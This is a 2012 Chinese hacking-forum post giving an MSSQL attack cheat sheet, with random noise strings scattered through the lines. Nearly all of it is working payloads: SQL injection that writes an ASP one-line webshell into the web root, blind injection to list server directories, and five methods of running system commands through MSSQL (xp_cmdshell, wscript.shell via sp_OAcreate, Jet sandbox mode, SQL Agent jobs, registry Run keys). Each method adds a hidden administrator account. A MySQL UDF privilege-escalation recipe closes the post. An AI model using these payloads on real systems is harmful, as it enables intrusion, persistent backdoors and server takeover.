找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2815|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
& L3 r% L! S4 {: M3 o首先确定网站的WEB路径
: Q% J) I' e$ ?; N% c. j;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
2 s. J' F1 d, ~* V) ^0 e
+ h5 k9 d/ u1 Z9 l3 q" s1 o;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 1 u% I0 q7 `  K- N' `/ E7 F% J
//将一句话木马插入表中7 Z6 H$ J  T# g% s2 D% i' U

& F8 U9 X4 F# `/ D; e% ?, ];execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- / m! m9 |5 Z# k1 ^) v8 Q7 F
//导出一个ASP文件" y1 a, s& D: B

: q, K" a/ z) ~) S
3 X9 ^; Q- X! F: |1 C关于MSSQL列目录
+ O& ?) a, L0 j;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
6 P1 R/ }7 ]) G* Z. O. f6 C! fInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表$ X$ ]" o; [7 G* v7 o

6 d2 u/ \/ d/ o2 Q* a& d! b) D. {$ hand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
: |  h6 G. X7 c' a, H
: z5 q5 \5 W6 b* J* v: ?4 R" K7 ~And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段$ @' T. n" X3 Y4 }) t5 v
# F% l# R' N1 C; \& v. t
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
0 w- ]# _, z& m, |; f1 z
# L. h0 V& B, Q, d% c
) ?5 x( y' D6 n' |数据库版本和权限查看6 j; x- ]3 Y7 {, P
and 1=(select @@VERSION) //查看详细的数据库信息.
# x. ^5 s4 V4 g' P, h+ _5 z: Yand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA( c' \0 B( Q) t2 C0 h6 w
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
# X+ X/ n8 i. j: B$ N9 L+ `$ U3 e% t. L9 T/ b5 {3 M5 L: }
/ O$ L' R! M' P6 o
1.利用xp_cmdshell执行命令
& A7 Y$ @" M1 e; u( |% X( f( ]exec master..xp_cmdshell 'net user rfire 123456 /add'$ M4 C( f0 C; l% X7 q+ }6 C- N
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
8 u/ |! h& D& C' M
# R# ?" `: V% Y恢复xp_cmdshell存储过程/ _9 w2 ]% d/ P. [
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 ?! V1 b" s, O0 P
9 E* U. j: Q/ B% {6 T
8 e! c8 U" o5 k, P- U
2.利用SP_OAcreate和SP_OAMETHOD执行命令
/ t5 B6 k1 ]+ g在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
: }" N9 [. E1 W: @& T. z# hDECLARE @shell INT //建立一个@shell实体
4 y/ y. i! A$ a$ B, Q* REXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例+ _7 G% ^1 E0 M, P8 H7 v4 x  d8 |
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例7 D- `3 I) x) w: g- [
  T! L. g$ k: X3 h: X
: u5 b' b3 t9 Z3 K5 q; h
3.利用沙盒模式& @7 c: d" q, G$ J* p, {7 v: |0 i
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。) F4 _9 H$ p2 `2 a5 P
开启沙盒模式:
/ w! j, z' W" MEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',07 E6 s$ n* M) V: s
: L  G# T' i( C1 U
执行命令:
( c9 o" D% g- dSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');6 b- i$ ~( j) f5 }# X
9 J. b, m  z- h8 J0 G; E0 [
) H& _9 P8 B9 C' Y% F; J
4.利用SQL代理执行命令
/ i' X! v8 k$ \. [$ g7 U+ NEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务) f$ _4 T1 g  D
# n# O$ ~5 B% @$ t, ~% q
执行命令:
# x$ ^$ Q/ h  K. _/ Iuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
. q* ]' T- }* [9 q% c6 p* cexec sp_add_job 'x'
7 _6 y2 ]4 @' T+ x; ~4 \exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业5 }# o% ]" q' r4 P8 K: j2 `
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
" ^! K% s; X& c3 M; O8 v- W* z# s
5 m' I' J& b9 x0 H+ E
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)! X/ ]& K6 w& p. C5 }
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
' \: d5 E  h, `+ D8 ?5 I2 p, C: {3 ?% n( C* q( n9 e- P

+ n4 k  J: K7 s; g( `, C6.MYSQL的命令执行
0 R/ |( Q$ a8 F1 J# E2 ?MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
5 t# o& l1 L+ `  J- P5 T$ l, r首先要在su.php下导出c:\windows\udf.dll
" z: P8 ?0 ]' U* S4 P0 P6 y) e. E导出后执行创建自定义函数命令:
9 |0 T2 _3 L' L% |% nCreate Function cmdshell returns string soname 'udf.dll'6 X: X- }+ A" S; U0 x5 n
执行命令
  h2 h6 R" X' M' Kselect cmdshell('net user rfire 123456 /add')( m, M5 Q: m5 U- a: V
执行后删除函数 drop function cmdshell: f, y$ W' |3 P9 g2 u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表